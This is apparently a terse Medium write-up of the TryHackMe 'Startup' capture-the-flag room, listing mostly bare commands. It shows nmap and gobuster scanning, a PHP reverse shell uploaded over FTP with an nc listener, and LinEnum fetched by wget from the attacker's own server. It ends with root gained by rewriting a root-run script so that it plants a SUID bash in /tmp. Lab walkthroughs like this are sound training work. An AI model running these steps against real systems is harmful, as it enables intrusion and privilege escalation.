Startup v1.3 — TryHackMe — WriteUp

nmap -A -T5 -v <ip>

nmap
FTP
website
page source

gobuster dir -u http://<ip>/ -w /path-to-wordlist

gobuster
/files

put php-reverse-shell.php

put
/files

nc -lvnp 1234

shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

find / -name *.txt 2>/dev/null

find
recipe.txt

python3 -m http.server 9000

python2 -m SimpleHTTPServer 9000

wget http://<your-vpn-ip>:9000/LinEnum.sh

./LinEnum.sh -r report -e /tmp -t

/vagrant
/incident
TCP Stream

cat /etc/passwd | grep /bin/bash

su lennie
1st flag
pspy32

chmod +x pspy32

scrips

cat > /etc/print.sh <<EOF
> #!/bin/bash
> echo “Done”
> cp /bin/bash /tmp/bash
> chmod 4755 /tmp/bash
> EOF

ls -la /tmp/bash

/tmp/bash -p

root.txt

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store